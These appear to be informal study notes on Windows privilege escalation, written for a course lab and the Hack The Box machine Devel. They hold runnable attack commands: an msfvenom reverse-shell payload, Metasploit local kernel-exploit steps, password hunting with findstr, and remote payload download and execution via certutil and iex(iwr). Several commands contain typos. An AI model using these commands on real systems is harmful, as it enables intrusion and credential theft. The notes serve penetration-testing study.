1. Enumeration & Kernel Exploits

all resources tou need !! https://github.com/TCM-Course-Resources/Windows-Privilege-Escalation-Resources/blob/master/README.md

Enumeration and first foothold

https://fuzzysecurity.com/ « so amayznig !! »

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

• throught FTP anonymous connection … we can download and UPLOAD the content !!

HTB MAchines

• https://app.hackthebox.com/machines/Devel

• IIS7 <—- the web server !! >
• Microsoft ASP .NET !!! <=== the framework !!

• Windows Server is the operating system !!

  what kina payloads to upload and execute ??

    * reveseShell.asp or .aspx 
  
    using `msfvenom`
  

Q) what is a meterpreter session ??

$ msfvenom -p windows/shell_revese_tcp LHOST=10.10.x.x LPORT=1234 -f aspx > shell.aspx

meterpreter> getuid 

meterpreter> sysinfo 

meterpreter> pwd 

meterpreter> cd c:\\windows\\temp

meterpreter> upload /home/user/Tool.exe

meterpreter> shell 
C:\windows\temp> 

C:\windows\temp> powershell -ep bypass
meterpreter> load powershell



meterpreter> run port/multi/recon/local_exploit_suggester     # ---> exploit/windows/local/ms1_015_kitrap0d


meterpreter> background		# like CTRL+Z
mdf6 exploit() > use exploit/windows/local/ms1_015_kitrap0d
mdf6 exploit(windows/local/ms1_015_kitrap0d) > options

mdf6 exploit(windows/local/ms1_015_kitrap0d) > set session [the number that came out after running "background"]
....
mdf6 exploit(windows/local/ms1_015_kitrap0d) > run



meterpreter> 

Enumeration

5 steps of hacking !! (MITER ATT&CK)

information gathering , scanneing and enum, exploitation

but even we exploited the machine ,,, we gonna go back to the enum step !!

Sys Enum

meterpreter> shell


C:\windows\temp> systeminfo 

# grep in CMD !! ??

C:\windows\temp> systeminfo  | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"


C:\windows\temp> hostname 

EXtract Patching !!!!

wmic := windows management instrumentation commandline

qfe := quick fix engineering

kbid := knowledge base id

C:\windows\temp> vmic qfe	
support.microsoft.com/?kbid = ....


C:\windows\temp> vmic qfe get Col1Name,Col2Name,... 


C:\windows\temp> vmic logicaldisk

C:\windows\temp> vmic logicaldisk get Col1Name,Col2Name,... 
 
C:\windows\temp> list drives??? <=== wrong !! 

User/groups Enum

C:\windows\temp> whoami

C:\windows\temp> whoami /priv

C:\windows\temp> whoami /groups

C:\windows\temp> net user					<==== show th users on the machine !! 

C:\windows\temp> net user specificUserName

C:\windows\temp> net localgroup specificUserName	<======= to findout the membership >

Net Enum

why ?? you could find that the machine having 2 NIC !!

C:\windows\temp> ipconfig /all

C:\windows\temp> arp -a

C:\windows\temp> route print 

# to check it there is a servers that only reachable from the inside (network) of the machine !! ---> poer forwarding

C:\windows\temp> netstat -ano 

Password Hunting

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop—looting-for-passwords

C:\Windows\system32> findstr /si password *.txt *.ini *.config

AV Enum

# Service Controle 

C:\windows\temp> sc query windefend					# windows defender

.....

C:\windows\temp> sc queryex type=service			# windows AVs

.....

C:\windows\temp> netsh advfirewall firewall dump	# windows Firewalls !!

C:\windows\temp> netsh firewall show state 

C:\windows\temp> netsh firewall show config

Commands

# wget 

> certutil -urlcachce -f http://10.10.x.x:8000/file.exe outname.exe

Automated Tools

Note : Note all tools may work, check there dependencies on the system before running

• WinPEAS.exe

    $ 
    $ 
  

• Windows PrivEsc Checklist

    $ 
    $ 
  

• Sherlock.ps1

    $ 
    $ 
  

• Watson.exe

    $ 
    $ 
  

• PowerUP.ps1

  Attacker side:

    $ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 
  	
    $ echo​ Invoke-AllChecks >> PowerUp.ps1
  
    $ python3 -m http.server 80
  

  Victim Side

    C:\> powershell -c iex(iwr http://IP_tun0:80/PowerUp.ps1)
  

• Psexec.exe

  remoteshell / telnet replacement that lets you execute processes on remote windows systems, copy files on remote systems, process there output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

  Attacker Side

    $ wget https://raw.githubusercontent.com/fortra/impacket/master/examples/psexec.py
  
    $ python3 psexec.py USERNAME:'PASSWORD'@1IP
  

• JAWS-enum.ps1

    $ 
    $ 
  

• Windows Exploit Suggester.py

    # copy the output of systeminfo from the victim machine into a file  
    $ 
    $ 
  

• Metasploit Local Exploit Suggester

    $ 
    $ 
  

• Seatbelt.exe

    $ 
    $ 
  

• SharpUp.exe

    $ 
    $ 
  

Kernel Exploits

https://github.com/SecWiki/windows-kernel-exploits